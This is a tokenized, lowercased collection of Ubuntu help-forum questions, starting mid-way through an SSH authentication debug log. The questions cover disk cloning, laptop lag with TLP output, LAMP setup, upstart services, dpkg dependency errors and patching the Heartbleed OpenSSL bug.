: authentications that can continue : publickey , gssapi-keyex , gssapi-with-mic , password , keyboard-interactive , hostbased debug3 : start over , passed a different list publickey , gssapi-keyex , gssapi-with-mic , password , keyboard-interactive , hostbased debug3 : preferred gssapi-keyex , gssapi-with-mic , publickey , keyboard-interactive , password debug3 : authmethod_lookup gssapi-keyex debug3 : remaining preferred : gssapi-with-mic , publickey , keyboard-interactive , password debug3 : authmethod_is_enabled gssapi-keyex debug1 : next authentication method : gssapi-keyex debug1 : no valid key exchange context debug2 : we did not send a packet , disable method debug3 : authmethod_lookup gssapi-with-mic debug3 : remaining preferred : publickey , keyboard-interactive , password debug3 : authmethod_is_enabled gssapi-with-mic debug1 : next authentication method : gssapi-with-mic debug1 : unspecified gss failure . minor code may provide more information credentials cache file '/tmp/krb5cc_1001 ' not found debug1 : unspecified gss failure . minor code may provide more information credentials cache file '/tmp/krb5cc_1001 ' not found debug1 : unspecified gss failure . minor code may provide more information if anyone knows what 's the cause of this problem i would greatly appreciate it .
444602	installing ubuntu to multiple pc 's via hdd cloning	our school will finally be moving on to ubuntu 14.04 lts from xp ( most probably ) . there will be a pilot run on ~40 pcs with same hardware . so what would be the best ( and least time consuming ) way to install ubuntu to these computers ? we want a fully configured ubuntu which should be identical on each computer . the present steps we are considering : use clonezilla : install ubuntu on one hard disk , install apps , configure it and then use clonezilla to clone the hard disks . concerns : disk uuid 's , their behaviour on same network ( same hostnames ) . use remastersys : make a fresh installation , install apps , configure it and use remastersys to create a full-backup type installation iso and then install it on all pcs to get fully configured pcs concerns : will it really work ( in theory it should ) , time consuming , too many steps involved . all pcs will be identical , even their usernames so perms are not an issue . please suggest some better way to do this . note : not all pcs are on network so network installation is not an option . please help as it is a make it or break it situation for the deployment of ubuntu .
444604	system performance is extremely laggy when copying and extracting files	after a clean install of ubuntu gnome 13.10 ( 64-bit ) and the according gnome 3 ( stable ) ppa my system ( samsung 900x3c ) is extremely laggy , when files are copied to the external hard-drive ( hdd ) or archives are extracted on my ssd ( crucial m4 msata 256 gb ) . the mouse pointer acts very choppy , so does the whole gnome shell . it gets better , when files are copied within the ssd , but the slowdown is clearly perceivable . this also occurs , when files are downloaded with high speed ( around 8 mb/s ) from the internet . i do n't know if this has to do with the same issue , but firefox is also laggy , especially the scrolling , when tabs are loading . also hd video in vlc is sometimes choppy too , even with hardware decoding enabled . i suspect , that the hard-drive is root of the problem , but what exactly is causing this slowdown ? using different schedulers ( noop , deadline , cfq ) did n't help . it also does n't make a difference , if the notebook is on battery or connected to a power supply . all hints and suggestions to solve this issue are desperately appreciated ! here is the /etc/defaul/tlp of tlp , a power savings tool , mabye this will help : -- - tlp 0.5 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +++ configured settings : /etc/default/tlp tlp_enable=1 disk_idle_secs_on_ac=0 disk_idle_secs_on_bat=2 max_lost_work_secs_on_ac=15 max_lost_work_secs_on_bat=60 sched_powersave_on_ac=0 sched_powersave_on_bat=1 nmi_watchdog=0 disk_devices= '' sda sdb sdc sdd '' disk_apm_level_on_ac= '' 255 255 '' disk_apm_level_on_bat= '' 255 255 '' disk_iosched= '' deadline cfq cfq cfq '' sata_linkpwr_on_ac=max_performance sata_linkpwr_on_bat=min_power pcie_aspm_on_ac=performance pcie_aspm_on_bat=powersave radeon_power_profile_on_ac=high radeon_power_profile_on_bat=low radeon_dpm_state_on_ac=performance radeon_dpm_state_on_bat=battery radeon_dpm_perf_level_on_ac=auto radeon_dpm_perf_level_on_bat=auto wifi_pwr_on_ac=1 wifi_pwr_on_bat=5 wol_disable=y sound_power_save_on_ac=0 sound_power_save_on_bat=1 sound_power_save_controller=y bay_poweroff_on_bat=0 bay_device= '' sr0 '' runtime_pm_on_ac=on runtime_pm_on_bat=auto runtime_pm_all=1 usb_autosuspend=1 usb_blacklist_wwan=1 restore_device_state_on_startup=0 +++ system info system = samsung electronics co. , ltd. 0.1 900x3c/900x3d/900x3e/900x4c/900x4d bios = p10abk release = ubuntu 13.10 kernel = 3.11.0-19-generic x86_64 /proc/cmdline = boot_image=/boot/vmlinuz-3.11.0-19-generic root=uuid=271463cd-ca74-46fa-9ce3-0de5a5aecec7 ro quiet splash vt.handoff=7 +++ system status tlp power save = enabled power source = battery +++ processor cpu model = intel ( r ) core ( tm ) i5-3317u cpu @ 1.70ghz /sys/devices/system/cpu/cpu0/cpufreq/scaling_driver = acpi-cpufreq /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor = ondemand /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq = 782000 [ khz ] /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq = 800000 [ khz ] /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies = 1701000 1700000 1600000 1500000 1400000 1300000 1200000 1100000 1000000 900000 800000 782000 [ khz ] /sys/devices/system/cpu/cpu1/cpufreq/scaling_driver = acpi-cpufreq /sys/devices/system/cpu/cpu1/cpufreq/scaling_governor = ondemand /sys/devices/system/cpu/cpu1/cpufreq/scaling_min_freq = 782000 [ khz ] /sys/devices/system/cpu/cpu1/cpufreq/scaling_max_freq = 800000 [ khz ] /sys/devices/system/cpu/cpu1/cpufreq/scaling_available_frequencies = 1701000 1700000 1600000 1500000 1400000 1300000 1200000 1100000 1000000 900000 800000 782000 [ khz ] /sys/devices/system/cpu/cpu2/cpufreq/scaling_driver = acpi-cpufreq /sys/devices/system/cpu/cpu2/cpufreq/scaling_governor = ondemand /sys/devices/system/cpu/cpu2/cpufreq/scaling_min_freq = 782000 [ khz ] /sys/devices/system/cpu/cpu2/cpufreq/scaling_max_freq = 800000 [ khz ] /sys/devices/system/cpu/cpu2/cpufreq/scaling_available_frequencies = 1701000 1700000 1600000 1500000 1400000 1300000 1200000 1100000 1000000 900000 800000 782000 [ khz ] /sys/devices/system/cpu/cpu3/cpufreq/scaling_driver = acpi-cpufreq /sys/devices/system/cpu/cpu3/cpufreq/scaling_governor = ondemand /sys/devices/system/cpu/cpu3/cpufreq/scaling_min_freq = 782000 [ khz ] /sys/devices/system/cpu/cpu3/cpufreq/scaling_max_freq = 800000 [ khz ] /sys/devices/system/cpu/cpu3/cpufreq/scaling_available_frequencies = 1701000 1700000 1600000 1500000 1400000 1300000 1200000 1100000 1000000 900000 800000 782000 [ khz ] /sys/devices/system/cpu/cpufreq/boost = 1 /proc/sys/kernel/nmi_watchdog = 0 +++ undervolting phc kernel not available . +++ temperatures cpu temp = 48 [ 째c ] fan speed = ( not available ) +++ file system /proc/sys/vm/laptop_mode = 2 /proc/sys/vm/dirty_writeback_centisecs = 6000 /proc/sys/vm/dirty_expire_centisecs = 6000 /proc/sys/vm/dirty_ratio = 20 /proc/sys/vm/dirty_background_ratio = 10 /proc/sys/fs/xfs/age_buffer_centisecs = ( not available ) /proc/sys/fs/xfs/xfssyncd_centisecs = ( not available ) /proc/sys/fs/xfs/xfsbufd_centisecs = ( not available ) +++ storage devices /dev/sda : model = m4-ct256m4ssd3 firmware = 07mh apm level = none/disabled status = active/idle trim = supported scheduler = deadline smart info : 5 reallocated_sector_ct = 0 9 power_on_hours = 5332 [ h ] 173 wear_leveling_count = 99 [ % ] 194 temperature_celsius = 0 [ 째c ] +++ sata aggressive link power management /sys/class/scsi_host/host0/link_power_management_policy = min_power /sys/class/scsi_host/host1/link_power_management_policy = min_power /sys/class/scsi_host/host2/link_power_management_policy = min_power /sys/class/scsi_host/host3/link_power_management_policy = min_power /sys/class/scsi_host/host4/link_power_management_policy = min_power /sys/class/scsi_host/host5/link_power_management_policy = min_power +++ pcie active state power management /sys/module/pcie_aspm/parameters/policy = default ( using bios preferences ) +++ intel graphics /sys/module/i915/parameters/powersave = 1 ( enabled ) /sys/module/i915/parameters/i915_enable_rc6 = -1 ( use per-chip default ) /sys/module/i915/parameters/i915_enable_fbc = -1 ( use per-chip default ) /sys/module/i915/parameters/lvds_downclock = 0 ( disabled ) /sys/module/i915/parameters/semaphores = -1 ( use per-chip default ) +++ wireless bluetooth = off ( software ) wifi = on wwan = none ( no device ) wlan0 ( iwlwifi ) : power management = on +++ audio /sys/module/snd_hda_intel/parameters/power_save = 1 /sys/module/snd_hda_intel/parameters/power_save_controller = y +++ battery status /sys/class/power_supply/bat1/manufacturer = samsung electronics /sys/class/power_supply/bat1/model_name = ( not available ) /sys/class/power_supply/bat1/cycle_count = 578 /sys/class/power_supply/bat1/charge_full_design = 5880 [ mah ] /sys/class/power_supply/bat1/charge_full = 4600 [ mah ] /sys/class/power_supply/bat1/charge_now = 4048 [ mah ] /sys/class/power_supply/bat1/current_now = 932 [ ma ] /sys/class/power_supply/bat1/status = discharging +++ runtime power management /sys/bus/pci/devices/0000:00:00.0/power/control = auto ( 0x060000 host bridge ) /sys/bus/pci/devices/0000:00:02.0/power/control = auto ( 0x030000 vga compatible controller ) /sys/bus/pci/devices/0000:00:16.0/power/control = auto ( 0x078000 communication controller ) /sys/bus/pci/devices/0000:00:1b.0/power/control = auto ( 0x040300 audio device ) /sys/bus/pci/devices/0000:00:1c.0/power/control = auto ( 0x060400 pci bridge ) /sys/bus/pci/devices/0000:00:1c.3/power/control = auto ( 0x060400 pci bridge ) /sys/bus/pci/devices/0000:00:1c.4/power/control = auto ( 0x060400 pci bridge ) /sys/bus/pci/devices/0000:00:1d.0/power/control = auto ( 0x0c0320 usb controller ) /sys/bus/pci/devices/0000:00:1f.0/power/control = auto ( 0x060100 isa bridge ) /sys/bus/pci/devices/0000:00:1f.2/power/control = auto ( 0x010601 sata controller ) /sys/bus/pci/devices/0000:00:1f.3/power/control = auto ( 0x0c0500 smbus ) /sys/bus/pci/devices/0000:01:00.0/power/control = auto ( 0x028000 network controller ) /sys/bus/pci/devices/0000:02:00.0/power/control = auto ( 0x020000 ethernet controller ) /sys/bus/pci/devices/0000:03:00.0/power/control = auto ( 0x0c0330 usb controller ) +++ usb tlp usb autosuspend = enabled tlp usb blacklist = ( not configured ) bus 001 device 004 id 2232:1024 control = auto , autosuspend_delay_ms = 2000 -- < unknown > ( no driver ) bus 001 device 002 id 8087:0024 control = auto , autosuspend_delay_ms = 2000 -- intel corp . integrated rate matching hub ( hub ) bus 001 device 001 id 1d6b:0002 control = auto , autosuspend_delay_ms = 2000 -- linux foundation 2.0 root hub ( hub ) bus 003 device 001 id 1d6b:0003 control = auto , autosuspend_delay_ms = 2000 -- linux foundation 3.0 root hub ( hub ) bus 002 device 001 id 1d6b:0002 control = auto , autosuspend_delay_ms = 2000 -- linux foundation 2.0 root hub ( hub )
444605	website not running on ubuntu after installing lamp stack	i did it ... i moved to ubuntu today for the first time . i 've been loyal to windows for quite a while , but here i am . anyway , i 'm not used to all the command line tools and i 'm facing some trouble with some essential parts of my work in this new environment . i have installed the lamp stack via these commands : $ sudo apt-get install tasksel $ sudo tasksel install lamp-server now i have the latest php , apache , mysql . i 've also installed phpmyadmin to this group via : $ sudo apt-get install phpmyadmin i have created a file on var/www with a simple phpinfo ( ) and it 's working alright . however , when i 've loaded my project into a new directory inside var/www - i 'm getting nothing back . just a blank white page . my website has been working correctly on windows via xampp and it is also running fine on my vps online , but here on my new system ... nothing . what could be wrong with my configuration ? how can i debug this issue ? i need my website working locally so i can continue my work here .
444609	compression setting for log files in /var/log	for the log files in /var/log , it appears that the wtmp and also the rotated wtmp.n are not ascii file and can only be read by the last command , so if they are compressed , one has to first uncompress them and then use last -f ... to read . the other compressed log files can be easily read using an editor such as emacs since they are ascii text files . is there a way to set `` compress '' for all other logs files except the wtmp.n ? ( i assume that if one uncomments the # compress in the /etc/logrotate.conf , # uncomment this if you want your log files compressed # compress then all log files will be compressed , including the wtmp . ) thanks
444612	changes in etc/dhcp/dhclient.conf get ignored	im wanting to never use a specified dns server so i tried using reject ip address as suggested here to my question : how to make ubuntu never use specified dns server ? ( dnsleak issues ) but setting always gets ignored .
444616	what process of google chrome to kill to close window from terminal ?	google chrome usually has 8 to 9 processes running , even though only one window is open . which one of these processes do i kill to safely close the google chrome window ? here is my ps -af | grep chrome output : 1000 2706 1 2 23:01 ? 00:00:52 /usr/bin/google-chrome-stable 1000 2713 2706 0 23:01 ? 00:00:00 /usr/bin/google-chrome-stable 1000 2714 2706 0 23:01 ? 00:00:00 /opt/google/chrome/chrome-sandbox /opt/google/chrome/chrome -- type=zygote 1000 2715 2714 0 23:01 ? 00:00:00 /opt/google/chrome/chrome -- type=zygote 1000 2719 2715 0 23:01 ? 00:00:00 /opt/google/chrome/nacl_helper 1000 2720 2715 0 23:01 ? 00:00:00 /opt/google/chrome/chrome -- type=zygote 1000 2839 2706 0 23:01 ? 00:00:08 /opt/google/chrome/chrome -- type=gpu-process -- channel=2706.3.250838429 -- supports-dual-gpus=false -- gpu-driver-bug-workarounds=0,1,27 -- disable-accelerated-video-decode -- gpu-vendor-id=0x1002 -- gpu-device-id=0x6760 -- gpu-driver-vendor=ati / amd -- gpu-driver-version=13.30 1000 2843 2839 0 23:01 ? 00:00:00 /opt/google/chrome/chrome -- type=gpu-process -- channel=2706.3.250838429 -- supports-dual-gpus=false -- gpu-driver-bug-workarounds=0,1,27 -- disable-accelerated-video-decode -- gpu-vendor-id=0x1002 -- gpu-device-id=0x6760 -- gpu-driver-vendor=ati / amd -- gpu-driver-version=13.30 1000 3038 2720 1 23:08 ? 00:00:28 /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force- [ ... very long options list ] 1000 4505 4441 0 23:40 pts/0 00:00:00 grep -- color=auto chrome
444617	how to partition for a successfull boot with raid5 + lvm +encryption	i have been trying to make this setup work for several days . the system never boots ... when i do a setup without the software raid i can get it to work . how should i set up my system partition to be able to boot with either legacy bios or uefi ? another mysterious thing is that i can not directly set up raid 5 with all my discs , i need to do a small partition in the beginning of every disk at first . if i do not do this , there will be one `` raid '' partition on every disc but no raid volume with 2/3 of the total amount of storage space .
444619	get a pdf plot from gnuplot	i want to obtain plots in pdf and i 'm using postscript as a terminal . i am able to watch the plots but they do not appear as i want them to . for instance , i write something like : '' $ t = `` .word ( t , t ) . `` ^\circ $ c '' and instead of getting t=750째c i obtain : $ t = 750\circ $ c is the problem related with the terminal ? the thing is that i need to obtain plots in pdf but in the gnuplot version i have ( 4.6.3 ) i do n't have all the terminals available , so i can not use pdfcairo , png ... can i get the plots in pdf with postscript ? if not , how can i install the pdfcairo or png libraries ?
444620	starting rtmp proxy shiva failed ubuntu server	we installed ubuntu server in vmware esxi 5.1. this is our nec collaboration server integrated with nec univerge 3c.. everything is working fine.. we move this machine to ovf file and move to another environment with same ip/subnet and everything is same such as domain , mail and ucm server . when we are turning on the ubuntu vm machine everything goes fine except rtmp proxy shiva ... i ran this command to check the eth `` ifconfig -a | grep 'eth ' '' and found that eth0 is replaced by eth1 i made necessary changes in interface file.. because hardware is changed but still rtmp proxy shiva is not working ... please help me to resolve this issue . thanks and regards , mohammed
444623	xampp control panel can not launch	after searching all over the www , i could n't solve my problem . i want to launch xampp via desktop control panel and also i made the xampp-control-panel.desktop in desktop and ~/.local/share/applications/ paths with the text below but no answer : [ desktop entry ] encoding=utf-8 name=xampp control panel comment=start or stop xampp exec=gksudo python /opt/lampp/share/xampp-control-panel/xampp-control-panel.py icon=/opt/lampp/htdocs/favicon.ico categories=application ; development ; web version=1.0 type=application terminal=0 i typed the command below : gksudo python /opt/lampp/share/xampp-control-panel/xampp-control-panel.py the answer was : error importing pygtk2 and pygtk2-libglade and then i tried : gksudo apt-get install python-glade2 and eventually when i click on xampp icon my administration password will be asked and when i type it nothing happens . what can i do to get the control panel working ?
444624	dependency problems prevent configuration	i 've gotten my ubuntu server into an inconsistent state . i 've read through a thread on a similar issue but am still unsure how best to proceed . here is some info : # dpkg -- print-architecture amd64 # uname -r 3.2.0-60-generic by way of background , i found the /boot partition was full and was attempting to clean up when i began getting errors . initially the kernel level was 3.2.0-44-generic but my upgrade attempts brought in newer files and unfortunately the /boot partition filled up again in the middle of upgrading . now i get the following : # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-39-generic linux-headers-3.2.0-34 linux-headers-3.2.0-40 linux-headers-3.2.0-41 linux-headers-3.2.0-43 linux-headers-3.2.0-38 linux-headers-3.2.0-39 linux-headers-3.2.0-34-generic linux-image-3.2.0-40-generic linux-image-3.2.0-43-generic linux-headers-3.2.0-40-generic linux-headers-3.2.0-43-generic linux-headers-3.2.0-38-generic linux-image-3.2.0-41-generic linux-image-3.2.0-39-generic linux-headers-3.2.0-41-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-server the following packages will be upgraded : linux-server 1 upgraded , 0 newly installed , 0 to remove and 159 not upgraded . 1 not fully installed or removed . need to get 0 b/1,734 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.45.54 ) ; however : version of linux-image-server on system is 3.2.0.60.71. linux-server depends on linux-headers-server ( = 3.2.0.45.54 ) ; however : version of linux-headers-server on system is 3.2.0.60.71. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) based on the prior solution i read about , i may need to manually download and install files , i 'm just not sure which ones . thanks for any assistance .
444626	is there any way to enable voice over for ipod not using itunes ?	i have an ipod shuffle which works fine : i can add and remove songs via rhythmbox . according to apple page my ipod is able to talk the name of the songs : give your songs a voice . say youâre listening to a song and want to know the title or the artist . just press the voiceover button on top of your ipod shuffle , and it tells you . you can even use voiceover to hear the names of playlists and switch between them . and if your battery needs charging , voiceover tells you that , too . from what i know , voice over can be only enabled if i use itunes . my question is : can i enable voice over only using ubuntu ? how ?
444632	sending one file to anther instalation of ubuntu	i 'm new to this networking stuff and would like to know how to get the two installations of ubuntu talking / find the mac address etc . i want to know how to send one file thatâs on my desktop to the other installation of ubuntu . can you advise on how this should be done and point met to documents i should read . i have them installed on vb .
444635	how can i hide a single appliction in the xfce taskbar ?	cisco 's anyconnect - when running - has both an icon in the tray and in the taskbar . the tray icon as everything that i need and therefore i 'd like to not have the anyconnect client show up in the taskbar to leave space for other applications that i launch . is this possible and could you please show me how ?
444637	how to install gfortron in ubuntu12.04 ?	i tried to install g fortran through different commands but i am always getting this answer unable to locate package i tried following commands sudo apt-get install gfortran-4.4 sudo apt-get install g fortran ..any one please help
444641	windows phone 8 music sync	i 've tried to sync my music between my lumia 920 and ubuntu 13.10/14.04 . when i copy/paste files into my device nothing happens . my device thinks there is no music at all . when i sync music by rhythmbox my music player see the music , but not album/artists . when i sync by qlix/gmtp there is information about album , album cover but no artist again . how to put music with all mp3 tags on windows phone 8 device ?
444642	ln : the symbolic link `` /documents '' could not be created : the requested function is not implemented	why i ca n't create a symbolic link in a webdav folder ? in a normal folder is it working . ln -s /home/argonist/dokumente/ ./dokumente
444643	how to use upstart feature of ubuntu to restart the python script but not as root ?	i am running my python script using upstart feature of ubuntu so that if for whatever reason my python script dies or gets killed , it can be restarted automatically and everything is working fine - so i decided to use upstart feature of ubuntu to restart the python script automatically . after creating the testing.conf file like this in /etc/init/testing.conf - start on runlevel [ 2345 ] stop on runlevel [ 016 ] chdir /tekooz respawn post-stop script sleep 30 end script exec python testing.py i ran below sudo command to start it and i can see that process running using ps ax and my python script is also running fine . and when i check the pid of the above process , i always see it is running as root . i do n't want to run that as root . instead i want to run that as deds account deds @ bx13 : / $ sudo start testing testing start/running , process 3635 deds @ bx13 : / $ ps aux | grep testing root 3635 2.4 0.1 364136 15660 ? ssl 12:24 0:00 python testing.py is there some other place where i need to put the testing.conf file and then run it with some other command ? update : - something like this - start on runlevel [ 2345 ] stop on runlevel [ 016 ] chdir /tekooz respawn post-stop script sleep 30 end script setuid deds exec python testing.py
444648	maas controller & kvm help	i have successfully been able to get a physical maas setup and a virtual maas setup going . the problem is i am having a hard time creating a hybrid setup , physical & virtual . my questions : right now , whenever i try and make a virtual network for kvm , it will not allow me to use the local network for ips . it will only allow me to use a different , private network behind nat . is there a way to make kvm not have vms on its own private network ? can i have kvm allow vms to be on the local , 192.168.1.x instead of 192.168.100.x ? if i ca n't , how do i add a maas cluster controller to a regional controller ? according to the documentation , that is how you should have it setup when managing separate networks . my idea is to have a physical controller and a virtual controller . virtual controls all vms on the 192.168.100.x while physical is .1.x . i have both networks working independently , physical maas and virtual maas both have nodes . i just need to get the clusters to talk to each other so i can have just 1 region controller . my setup ( ip 's are made up ) i have a physical region controller @ 192.168.1.100 , nodes at 192.168.1.10-16 . 192.168.1.100 also hosts the virtual network and vms . i have a virtual region controller @ 192.168.100.100 nodes at 192.168.100.10-16 . 192.168.1.100 can ping and talk to all the nodes @ 192.168.100.x , but for some reason when i take the virtual controller out of the picture and try and add nodes directly to the 1.100 , they ca n't receive the connection . if i boot to iso and select `` specify maas server '' i am able to choose 192.168.1.100:80 '' but then they reboot and tr and pxe boot , nothing appears in the node list .
444650	windows user questioning his switch to ubuntu	as a long time windows user , is it worth it to install ubuntu over windows ? will i still be able to use all of software and other features i currently use in windows ? i am running a laptop with a core i7 , 64x w/ 4gb ram . which version would be best for me to install ?
444652	setting priority of wireless networks in kde network manager	is there a way to determine the priority of wireless networks ? the kde networkmanager applet works fine , but it often connects to the wrong wireless network by default when multiple networks are available . ( for example : at work we have a network a that allows printing , but which is not available throughout the building ; and a network b that works everywhere , but that does not allow printing . obviously i want to connect to b only if a is not available , but the networkmanager just seems to prefer b . )
444659	make ubuntu acknowledge that a custom built version of php is installed	i 'm trying to install php from source code on my ubuntu 12.04 vps . i 'm using these parameters in the configure command : -- enable-intl -- with-openssl -- without-pear -- with-gd -- with-jpeg-dir=/usr -- with-png-dir=/usr -- with-freetype-dir=/usr -- with-freetype -- enable-exif -- enable-zip -- with-zlib -- with-zlib-dir=/usr -- with-mcrypt=/usr -- with-pdo-sqlite -- enable-soap -- enable-xmlreader -- with-xsl -- enable-ftp -- with-curl=/usr -- with-tidy -- with-xmlrpc -- enable-sysvsem -- enable-sysvshm -- enable-shmop -- with-mysql=mysqlnd -- with-mysqli=mysqlnd -- with-pdo-mysql=mysqlnd -- enable-pcntl -- with-readline -- enable-mbstring -- with-curl -- with-pgsql -- with-pdo-pgsql -- with-gettext -- enable-sockets -- with-bz2 -- enable-bcmath -- enable-calendar -- with-libdir=lib -- enable-maintainer-zts -- with-gmp -- enable-fpm now , this goes all well and good . the version works as expected and during the installation i had no trouble . now the fun stuff comes . whenever i want to install something like mcrypt ( for example ) i would normally type apt-get install php5-mcrypt but when i do , and take a look at the dependencies i see that php5 is still listed as one and will be installed once i hit y ( overwriting my own version ) . now the real core of my question is , how do i let ubuntu know that i already have php5 installed so that it does not attempt to install php5 as a dependency anymore . do i have to change something in the configure process ? do i have to install php5 using the apt-get manner first , remove it manually , and install my own version of php after . it is worth mentioning that i need this custom php build to make pthreads work since there is n't a repo that offers a zts version of php ( yet , please make one , somebody ? ) .
444665	no access to nas via ftp on nautilus but works with filezilla v3	as said in the title , for some unknown reason when i try to make a connection to connect to a nas on my network by the standard nautilus commend `` file > connect to a server > ftp with authentication '' i get the following message : error message which can be translated as : resolution error : no address associated with the host name . on the contrary , when i use filezilla v3 it seems to work : working does anyone have an idea on this strange behaviour ? thanks in advance , laurent
444666	cant access 12.10 after upgrade	i upgraded from 12.04 to 12.10 . after rebooting , i just had a black screen . spending hours looking through the web and trying to update through recovery mode i eventually added repositories ppa : ubuntu-x-swat/x-updates and then installed nvidia-current . now i can access 12.10 but it goes straight to a black screen like a terminal and asks for login details . any help to get back to normal would be greatly appreciated .
444672	getting error while installing kerio vpn	when i try to install kerio , the message below appear : dpkg : error processing kerio-control-vpnclient-8.1.1-1212-p3-linux.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : kerio-control-vpnclient-8.1.1-1212-p3-linux.deb i think the problem is my country filtering , is that possible ? ? ? : ( thanks in advance
444674	newly compiled kernel not booting up ( vanilla kernel 3.12.14 )	i downloaded , configured and installed kernel downloaded from kernel.org . while booting up this new kernel for the first time , this error screen shows which is pointing towards a missing or wrongly mentioned root device probably . but i did n't mention it explicitly , installation scripts did it . so if this is the error , can someone please tell how to fix ? or if the cause may be something else , please tell what it can be ? note : i am using virtualbox for all this process . do n't want my laptop to become unbootable for this experiment .
444675	share one firewire connection over the other ?	here 's my situation : i have an old video camera that exports over 4-pin firewire . the problem is that all my cords in the house that have 4-pin fw go to firewire 400 on the other end - and all the 'modern ' machines in the house use fw 800 . i do have a lifeline , though : a connection to the past in the form of am imac g4 running ubuntu server . it has two firewire 400 ports on it . i also have a firewire 400 > firewire 800 cable . so i have all the ingredients . i 've done before on os x on this machine , before i wiped it to ubuntu , where i 'share ' one firewire connection with the other . however , i ca n't find a way to easily do this in ubuntu server . is there a way to share one firewire 400 connection with the other , essentially connecting the two ?
444676	intel hd4000 slow graphics performance on external display	i am using ubuntu 13.10 . i have a dell latitude e6430 laptop . it has two graphic adapters , intel hd 4000 and nvidia nvs 5200m with optimus technology . 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108glm [ nvs 5200m ] ( rev a1 ) i have very bad graphics performance on my external display connected to my laptop via hdmi . i thought nvidia driver would fix it and i tried different techniques to install nvidia driver and they all failed , in the last 3 days i have reinstalled ubuntu like 30 times . so i gave up on the idea of setting up nvidia graphics addapter . since i use ubuntu only for work i do n't need high graphics performance . ijust need a way to configure my external display with the intel hd 4000 graphics card so the mousepointer would not leave the trail and the graphics performance would be acceptable . thank you . ~ $ xrandr screen 0 : minimum 320 x 200 , current 3520 x 1080 , maximum 32767 x 32767 lvds1 connected primary 1600x900+0+0 ( normal left inverted right x axis y axis ) 310mm x 174mm 1600x900 60.0*+ 40.0 1440x900 59.9 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) lvds-2 disconnected ( normal left inverted right x axis y axis ) dp-1 disconnected ( normal left inverted right x axis y axis ) dp-2 disconnected ( normal left inverted right x axis y axis ) hdmi-1 connected 1920x1080+1600+0 ( normal left inverted right x axis y axis ) 477mm x 268mm 1920x1080 60.0*+ 50.0 59.9 1920x1080i 60.1 50.0 60.0 1680x1050 59.9 1600x900 60.0 1280x1024 60.0 1280x800 59.9 1280x720 60.0 50.0 59.9 1440x576i 50.1 1024x768 60.0 1440x480i 60.1 60.1 800x600 60.3 720x576 50.0 720x480 60.0 59.9 640x480 60.0 59.9 vga-2 disconnected ( normal left inverted right x axis y axis ) 1024x768 ( 0x55 ) 65.0mhz h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 800x600 ( 0x58 ) 40.0mhz h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 640x480 ( 0x5d ) 25.2mhz h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 59.9hz
444677	ubuntu freezes at login	i recently installed another os in my laptop to have two os , i installed windows 8.1 . when i choose ubuntu it freezes at log in screen . what can i do to fix this ? ubuntu is my main o.s . thanks in advance : )
444682	change color of background on login screen	edit : i should mention i 'm running ubuntu 12.04 with cinnamon , though i could switch to unity to change , then switch back . alright , so i changed the background on my login screen ( the cheap way , by just renaming my image to `` /usr/share/backgrounds/warty-final-ubuntu.png '' ) , and the color of the ubuntu loading splash ( by editing /lib/plymouth/themes/ubuntu-logo/ubuntu-logo.script ) . these both work perfectly fine . the problem : between the loading splash and the login screen , there 's a brief period while my background image loads , where the background is just the default purple color , with the white dot overlay . i 'd like to know how i can change the color of this ( and possibly get rid of the dots too ) .
444687	app transfer from the dvd to ubuntu	how can i copy software from the distribution dvd to ubuntu ? is there any way to do that ?
444693	ca n't log out/restart/shutdown via top menu bar	when i click on log out , restart or shutdown nothing happens , but i can suspend computer . what 's wrong ? i 'm using ubuntu 13.10 .
444696	problem in connecting wifi on a dell inspiron 1420	my dell inspiron running ubuntu 12.04 lts , cant detect wifi signals and even not showing wifi icon also . i have tried several methods after reading around 20-25 forums and blogs , but still their is no solution : ( how should i go about fixing it ... its my first installtion/interaction with linux ! ! please suggest me what to do ... thanks a lot for all your help guys ...
444698	microsoft vm installing openemr on ubuntu	i am installing openemr on ms cloud vm using ubuntu . there are different versions of openemr such as : 1 windows 2.ubuntu/debian 3 linux which download should i use ? is umbutu/debian same as umbutu ?
444700	software center locked	an error has occurred , please run package manager from the right click menu or apt- get in a terminal to see what was wrong . the error message was 'unknown error : ' < type 'exceptions.system error ' > ' ( e : \ the package google\chrome\stable needs to be re-installed , but i ca n't find an archive for it ) ' this usually means that your installed packages have unmet dependencies i have a red circle with a horizontal white bar , next to the mail icon on the top bar . the above is what it says when i click on it . i do n't know how to find the package manager , and have n't been able to find the right click menu . i am a newbie to ubuntu , as you can see . can you help me to rid my software of that hideous red circle ... please ?
444702	how to patch the heartbleed bug ( cve-2014-0160 ) in openssl ?	as of today , a bug in openssl has been found affecting versions 1.0.1 through 1.0.1f ( inclusive ) and 1.0.2-beta . since ubuntu 12.04 , we are all vulnerable to this bug . in order to patch this vulnerability , affected users should update to openssl 1.0.1g . how can every affected user apply this update now ?
